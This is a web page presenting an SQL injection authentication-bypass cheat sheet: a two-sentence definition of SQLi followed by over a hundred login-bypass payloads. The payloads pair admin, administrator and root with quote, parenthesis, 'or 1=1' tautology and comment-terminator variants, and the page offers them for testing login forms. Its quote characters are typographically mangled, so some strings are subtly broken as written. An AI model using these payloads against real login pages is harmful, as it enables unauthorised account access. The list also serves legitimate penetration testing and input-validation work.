SQL Injection Authentication Bypass Cheat Sheet
SQL injection, also known as SQLi, is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Specifically, SQL injection to bypass authentication involves using a series of strings to test on the login page or parameters. This can be completed both manually or with an automated tool.
or 1=1
or 1=1–
or 1=1#
or 1=1/*
admin’ —
admin’ #
admin’/*
admin’ or ‘1’=’1
admin’ or ‘1’=’1′–
admin’ or ‘1’=’1’#
admin’ or ‘1’=’1’/*
admin’or 1=1 or ”=’
admin’ or 1=1
admin’ or 1=1–
admin’ or 1=1#
admin’ or 1=1/*
admin’) or (‘1’=’1
admin’) or (‘1’=’1’–
admin’) or (‘1’=’1’#
admin’) or (‘1’=’1’/*
admin’) or ‘1’=’1
admin’) or ‘1’=’1′–
admin’) or ‘1’=’1’#
admin’) or ‘1’=’1’/*
admin” —
admin” #
admin”/*
admin” or “1”=”1
admin” or “1”=”1″–
admin” or “1”=”1″#
admin” or “1”=”1″/*
admin”or 1=1 or “”=”
admin” or 1=1
admin” or 1=1–
admin” or 1=1#
admin” or 1=1/*
admin”) or (“1″=”1
admin”) or (“1″=”1”–
admin”) or (“1″=”1″#
admin”) or (“1″=”1″/*
admin”) or “1”=”1
admin”) or “1”=”1″–
admin”) or “1”=”1″#
admin”) or “1”=”1″/*
administrator’ —
administrator’ #
administrator’/*
administrator’ or ‘1’=’1
administrator’ or ‘1’=’1′–
administrator’ or ‘1’=’1’#
administrator’ or ‘1’=’1’/*
administrator’or 1=1 or ”=’
administrator’ or 1=1
administrator’ or 1=1–
administrator’ or 1=1#
administrator’ or 1=1/*
administrator’) or (‘1’=’1
administrator’) or (‘1’=’1’–
administrator’) or (‘1’=’1’#
administrator’) or (‘1’=’1’/*
administrator’) or ‘1’=’1
administrator’) or ‘1’=’1′–
administrator’) or ‘1’=’1’#
administrator’) or ‘1’=’1’/*
administrator” —
administrator” #
administrator”/*
administrator” or “1”=”1
administrator” or “1”=”1″–
administrator” or “1”=”1″#
administrator” or “1”=”1″/*
administrator”or 1=1 or “”=”
administrator” or 1=1
administrator” or 1=1–
administrator” or 1=1#
administrator” or 1=1/*
administrator”) or (“1″=”1
administrator”) or (“1″=”1”–
administrator”) or (“1″=”1″#
administrator”) or (“1″=”1″/*
administrator”) or “1”=”1
administrator”) or “1”=”1″–
administrator”) or “1”=”1″#
administrator”) or “1”=”1″/*
root’ —
root’ #
root’/*
root’ or ‘1’=’1
root’ or ‘1’=’1′–
root’ or ‘1’=’1’#
root’ or ‘1’=’1’/*
root’or 1=1 or ”=’
root’ or 1=1
root’ or 1=1–
root’ or 1=1#
root’ or 1=1/*
root’) or (‘1’=’1
root’) or (‘1’=’1’–
root’) or (‘1’=’1’#
root’) or (‘1’=’1’/*
root’) or ‘1’=’1
root’) or ‘1’=’1′–
root’) or ‘1’=’1’#
root’) or ‘1’=’1’/*
root” —
root” #
root”/*
root” or “1”=”1
root” or “1”=”1″–
root” or “1”=”1″#
root” or “1”=”1″/*
root”or 1=1 or “”=”
root” or 1=1
root” or 1=1–
root” or 1=1#
root” or 1=1/*
root”) or (“1″=”1
root”) or (“1″=”1”–
root”) or (“1″=”1″#
root”) or (“1″=”1″/*
root”) or “1”=”1
root”) or “1”=”1″–
root”) or “1”=”1″#
root”) or “1”=”1″/*